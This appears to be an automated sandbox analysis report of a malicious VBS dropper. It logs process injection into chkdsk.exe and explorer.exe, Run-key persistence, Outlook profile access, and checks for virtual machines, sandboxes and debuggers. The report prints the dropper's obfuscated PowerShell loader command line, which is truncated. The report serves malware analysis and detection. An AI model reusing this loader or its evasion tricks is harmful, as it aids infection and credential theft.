      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8276:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8276:120:WilError_03
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cnf13429226.vbs"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
      Source: Binary string: ielowutil.pdbGCTL source: explorer.exe, 00000015.00000002.7501684681.0000000013D43000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7441028199.00000000052A6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: chkdsk.exe, 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3418034862.00000000054C2000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: chkdsk.exe, chkdsk.exe, 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3418034862.00000000054C2000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmp
      Source: Binary string: ielowutil.pdb source: explorer.exe, 00000015.00000002.7501684681.0000000013D43000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7441028199.00000000052A6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: firefox.pdb source: chkdsk.exe, 00000016.00000003.3608146584.0000000009C90000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000003.3660964442.000000000A365000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Obfuscated command line found
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nonreliableness = """InFSauPanRecbutPeiRaoHunSm AfSHapOviSknRedRdeRerAeoHukTvsMa0Ch La{Af Co Ph In FrpbaaFirUraEkmBe(Sp[stSFotOrrGaiRenHigAm]Ud`$giAPanAntPohKrrStoAppCroResVecVeoBopOryCa)Id;Am Ga Le St Tr`$EpKChaudnViuSerWeisi Pr=Ho buNAleBiwCr-FrONubMojSkechcFotbi DebReyfitCoeFo[Fo]Pa Tu(Gr`$OuAAbnFatAshUnrDyoDupHeonosNocInoRepVayHy.ReLUneshnDigTotNahPi Ov/Se De2Un)Pr;Sq Ku Re Af MuFKroGerTr(Af`$SvTSirQuaHycBltUriSulMoiSutOvyAm=Wa0Sp;Un Ra`$BoTDerBoaAncVitToiLalTsiChtSeyBl Am-PalPltFe Al`$ChAChnNotInhOlrTyoMepseoPlsSycApoBspPryBu.StLUnePanWugDytsyhre;Fl Zo`$StTParUnaPrcUntDiirelPeiVitNoyPh+Pr=An2St)Ne{Dy Br Ch`$FoBBeaForFobJuaAgrHyoViuFesTh Qu=Th Ca`$XiAAfnSgtFahUnrJaoTepBroDesHecHyoEjpUlyRe.AnSHjuMabDisLotKurUriCynangSe(Ag`$TaTVerNeaUdcLktOvilelBiiSttKeyCo,ty Vr2St)Ti;Re Ba Fa Ge Bl Sv Bl Se Ns`$DrKSaaEunKouHorApiDa[Pr`$MeTBlrMeaFecBltObiUdlPriSttNoyFa/Ge2Am]Tr Ti=Ru Pa[HucDeoTanAlvBleSnrCotPe]Sy:Kl:ViTEdoPuBAfyAmtPrePr(Au`$HoBPraMirEybReaCirTaoOmuImsSy,Ov St1De6Im)St;To Be Ra`$BoKMiaNanTruBorTuise[Fl`$skTDorAmaSecIntUniChlMoiwatPlyRo/Au2Pr]Re Le=Go ba(Ba`$ToKUdaInnUnuVirUniCa[Un`$soTKrrScaAkcTitSeiFylJuiSutThyBr/em2Fo]In Un-BrbMexLkoTrrLa Vu1St5Co1Sa)Va;Du Lt In Be Ko}un Mi[suSTrtSerCaiAmnFigLi]Ch[maSboyLasDitSteAnmFi.haTSmeNexTutMo.BaEFrnEscAtoMadNoiAtnengSn]St:ca:TiAToSZeCFoIskIDr.ClGsueFitGlSFotBerStikanimgSe(St`$GrKKlaSknAnuKrrFoiCr)Ha;Gi}He`$ToMHuategOpnStaVelNoeCo2Me7De0Ga=ArSTopMiiFrnAcdPreHorSaoFakErsFr0Fa Fo'HiCOp4KeEUnEryEta4HoEAl3HaFUd2DoFSyAGrBsh9InFFj3ThFLaBAnFBoBOf'Ca;Ga`$SeMKeaUngVinnaaImlTeeDe2Kp7Al1In=TeSLopBiiDunIndSieUirFyoGekCosTa0tu Sh'FiDThAUnFGlEArFVi4LeEDi5TrFSt8EnEWa4ReFIr8KrFDi1FeEDi3BrBBa9InCKa0HuFOmEDrFFu9FaABa4SaAUn5BuBDe9GiCSl2NoFMa9KuEGe4WaFRe6MaFNo1MaFAr2KoDFu9KoFRk6FoETe3ReFGaEBaEMe1ThFEx2DoDKaAFrFMa2TaEGa3NaFEsFEcFMo8SkFPe3PrEBr4Ko'mu;El`$ImMNoaUdgNonCoaMalHoeEm2Om7Is2Pr=ApSDapskiHenAadOpeDerKooTikFrsDa0Bu fy'BoDSy0InFNa2FaEAd3DeCKu7OvECa5FoFSk8OvFPo4CuDfi6RoFEc3LeFSp3SkENs5AuFSy2InELs4ArEBa4Lg'Fo;Co`$MaMfiaRogSonHaaHolNgesy2St7Re3Ga=FySNypFliBlnEmdAmePhrMooSikStsKl0Di To'MyCHe4YaEfrEFeEDe4SeEhi3SoFTi2TeFOiAStBSl9inCSe5UhECi2loFPa9DrEKl3ViFFjETiFCaAclFCh2StBTe9GrDCoEOvFHo9PaEEl3NiFVi2OlETr5RoFAb8PrESa7StCpr4OdFGa2InETe5ToEGi1blFUdEFnFTi4TiFKb2CaEFl4SeBOt9UnDAnFChFSe6PyFYt9DeFOv3SyFEdBStFBo2SkCRe5MyFNo2AsFCe1Mo'Da;Mo`$ReMHyaStgFunToaRelnoeSl2tu7Ov4Pu=VeSTrpSaiKinVedPreKirFioUdkLesDr0Na Hi'FoEAf4ToESu3YaESt5SaFVoEFlFla9ZeFMa0Kv'Su;Ye`$DrMEnaMegkanEraJolRteCe2Cl7Va5Fo=MiSYdpHiitenThdSteCorSeoPrkCisrg0Pr Dr'KvDCo0SpFEg2YeEPd3inDUrAStFUn8CaFEn3PrEAm2NoFReBSiFPr2ChDViFInFGu6MeFca9FoFFu3ZyFHyBIgFEs2Ek'Do;Mo`$PrMPeaKegFrnScaRelHeeUn2Mi7Re6Li=LeSFopGiiSynBedvieInrXeospkZasGa0Ni vi'SyCJi5SmCHe3AsCAn4FoEbu7RdFSt2NoFCy4PeFFoEFoFRe6BiFBiBBeDro9RaFAn6NaFQuATyFDy2moBPaBClBso7EtDFoFDeFChEYeFMa3DrFSp2tuDSl5KdEGaEteCun4udFEcEomFKa0FdBAbBFiBPu7RaCSv7HaEFe2LaFHi5FaFLaBVaFPoESeFPy4So'Ra;Me`$ArMApaStgfonPraPrlSteV
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$nonreliableness = """InFSauPanRecbutPeiRaoHunSm AfSHapOviSknRedRdeRerAeoHukTvsMa0Ch La{Af Co Ph In FrpbaaFirUraEkmBe(Sp[stSFotOrrGaiRenHigAm]Ud`$giAPanAntPohKrrStoAppCroResVecVeoBopOryCa)Id;Am Ga Le St Tr`$EpKChaudnViuSerWeisi Pr=Ho buNAleBiwCr-FrONubMojSkechcFotbi DebReyfitCoeFo[Fo]Pa Tu(Gr`$OuAAbnFatAshUnrDyoDupHeonosNocInoRepVayHy.ReLUneshnDigTotNahPi Ov/Se De2Un)Pr;Sq Ku Re Af MuFKroGerTr(Af`$SvTSirQuaHycBltUriSulMoiSutOvyAm=Wa0Sp;Un Ra`$BoTDerBoaAncVitToiLalTsiChtSeyBl Am-PalPltFe Al`$ChAChnNotInhOlrTyoMepseoPlsSycApoBspPryBu.StLUnePanWugDytsyhre;Fl Zo`$StTParUnaPrcUntDiirelPeiVitNoyPh+Pr=An2St)Ne{Dy Br Ch`$FoBBeaForFobJuaAgrHyoViuFesTh Qu=Th Ca`$XiAAfnSgtFahUnrJaoTepBroDesHecHyoEjpUlyRe.AnSHjuMabDisLotKurUriCynangSe(Ag`$TaTVerNeaUdcLktOvilelBiiSttKeyCo,ty Vr2St)Ti;Re Ba Fa Ge Bl Sv Bl Se Ns`$DrKSaaEunKouHorApiDa[Pr`$MeTBlrMeaFecBltObiUdlPriSttNoyFa/Ge2Am]Tr Ti=Ru Pa[HucDeoTanAlvBleSnrCotPe]Sy:Kl:ViTEdoPuBAfyAmtPrePr(Au`$HoBPraMirEybReaCirTaoOmuImsSy,Ov St1De6Im)St;To Be Ra`$BoKMiaNanTruBorTuise[Fl`$skTDorAmaSecIntUniChlMoiwatPlyRo/Au2Pr]Re Le=Go ba(Ba`$ToKUdaInnUnuVirUniCa[Un`$soTKrrScaAkcTitSeiFylJuiSutThyBr/em2Fo]In Un-BrbMexLkoTrrLa Vu1St5Co1Sa)Va;Du Lt In Be Ko}un Mi[suSTrtSerCaiAmnFigLi]Ch[maSboyLasDitSteAnmFi.haTSmeNexTutMo.BaEFrnEscAtoMadNoiAtnengSn]St:ca:TiAToSZeCFoIskIDr.ClGsueFitGlSFotBerStikanimgSe(St`$GrKKlaSknAnuKrrFoiCr)Ha;Gi}He`$ToMHuategOpnStaVelNoeCo2Me7De0Ga=ArSTopMiiFrnAcdPreHorSaoFakErsFr0Fa Fo'HiCOp4KeEUnEryEta4HoEAl3HaFUd2DoFSyAGrBsh9InFFj3ThFLaBAnFBoBOf'Ca;Ga`$SeMKeaUngVinnaaImlTeeDe2Kp7Al1In=TeSLopBiiDunIndSieUirFyoGekCosTa0tu Sh'FiDThAUnFGlEArFVi4LeEDi5TrFSt8EnEWa4ReFIr8KrFDi1FeEDi3BrBBa9InCKa0HuFOmEDrFFu9FaABa4SaAUn5BuBDe9GiCSl2NoFMa9KuEGe4WaFRe6MaFNo1MaFAr2KoDFu9KoFRk6FoETe3ReFGaEBaEMe1ThFEx2DoDKaAFrFMa2TaEGa3NaFEsFEcFMo8SkFPe3PrEBr4Ko'mu;El`$ImMNoaUdgNonCoaMalHoeEm2Om7Is2Pr=ApSDapskiHenAadOpeDerKooTikFrsDa0Bu fy'BoDSy0InFNa2FaEAd3DeCKu7OvECa5FoFSk8OvFPo4CuDfi6RoFEc3LeFSp3SkENs5AuFSy2InELs4ArEBa4Lg'Fo;Co`$MaMfiaRogSonHaaHolNgesy2St7Re3Ga=FySNypFliBlnEmdAmePhrMooSikStsKl0Di To'MyCHe4YaEfrEFeEDe4SeEhi3SoFTi2TeFOiAStBSl9inCSe5UhECi2loFPa9DrEKl3ViFFjETiFCaAclFCh2StBTe9GrDCoEOvFHo9PaEEl3NiFVi2OlETr5RoFAb8PrESa7StCpr4OdFGa2InETe5ToEGi1blFUdEFnFTi4TiFKb2CaEFl4SeBOt9UnDAnFChFSe6PyFYt9DeFOv3SyFEdBStFBo2SkCRe5MyFNo2AsFCe1Mo'Da;Mo`$ReMHyaStgFunToaRelnoeSl2tu7Ov4Pu=VeSTrpSaiKinVedPreKirFioUdkLesDr0Na Hi'FoEAf4ToESu3YaESt5SaFVoEFlFla9ZeFMa0Kv'Su;Ye`$DrMEnaMegkanEraJolRteCe2Cl7Va5Fo=MiSYdpHiitenThdSteCorSeoPrkCisrg0Pr Dr'KvDCo0SpFEg2YeEPd3inDUrAStFUn8CaFEn3PrEAm2NoFReBSiFPr2ChDViFInFGu6MeFca9FoFFu3ZyFHyBIgFEs2Ek'Do;Mo`$PrMPeaKegFrnScaRelHeeUn2Mi7Re6Li=LeSFopGiiSynBedvieInrXeospkZasGa0Ni vi'SyCJi5SmCHe3AsCAn4FoEbu7RdFSt2NoFCy4PeFFoEFoFRe6BiFBiBBeDro9RaFAn6NaFQuATyFDy2moBPaBClBso7EtDFoFDeFChEYeFMa3DrFSp2tuDSl5KdEGaEteCun4udFEcEomFKa0FdBAbBFiBPu7RaCSv7HaEFe2LaFHi5FaFLaBVaFPoESeFPy4So'Ra;Me`$ArMApaStgfonPraPrlSteVJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB0DE75D95 push eax; ret 3_2_00007FFB0DE75DAD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058297A1 push es; iretd 22_2_058297A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058221AD pushad ; retf 0004h22_2_0582223F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058508CD push ecx; mov dword ptr [esp], ecx22_2_058508D6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0501EA87 push ds; retf 22_2_0501EAB1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0502970B push ebx; iretd 22_2_05029713
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05015087 push edx; retf 22_2_05015088
      Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 88XDM26Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 88XDM26Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect Any.run
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Potential evasive VBS script found (use of timer() function in loop)
      Source: Initial fileInitial file: do while timer-Klunkestil4<Klunkestil5
      Source: C:\Windows\explorer.exe TID: 5580Thread sleep time: -65000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 2172Thread sleep count: 106 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exe TID: 2172Thread sleep time: -212000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 rdtsc 22_2_05891763
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8670Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 753Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 763Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeAPI coverage: 3.0 %
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05023180 FindFirstFileW,FindNextFileW,FindClose,22_2_05023180
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeSystem information queried: ModuleInformationJump to behavior
      Source: explorer.exe, 00000015.00000000.3361689711.00000000105AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7493355403.00000000105AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc.U^
      Source: wscript.exe, 00000001.00000003.2394278721.00000216538CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Cv9tNJQbyOxCSBg2w/2czvdIO4qySglyQhO1yw2o7MLIzF6wQgt0x0qz7NpIiEIOSvMcio
      Source: explorer.exe, 00000015.00000000.3361689711.00000000105AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7493355403.00000000105AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWROFILE=C:\Users\userwindir=C:\WindowsZES_ENABLE_SYSMAN=1PIntel(R)
      Source: explorer.exe, 00000015.00000000.3361689711.00000000105AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000000.3361689711.00000000105D9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7493355403.00000000105AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.7493355403.00000000105D8000.00000004.00000001.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7441028199.000000000530A000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000016.00000002.7457453939.0000000009C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000001.00000003.2452404678.0000021653E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;QZdladsuIzF6wQgt0x0qz7NpIiEIOSvMcioWdN8N/q51SoT1/8fLqhZv7N21qlEKs0iSX7MPJEXtSQjpYwc0O5Auo?k|
      Source: wscript.exe, 00000001.00000003.2445534769.0000021653E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;QZdladsuIzF6wQgt0x0qz7NpIiEIOSvMcioWdN8N/q51SoT1/8fLqhZv7N21qlEKs0iSX7MPJEXtSQjpYwc0O5Auo{k|

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 rdtsc 22_2_05891763
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CE588 mov eax, dword ptr fs:[00000030h]22_2_058CE588
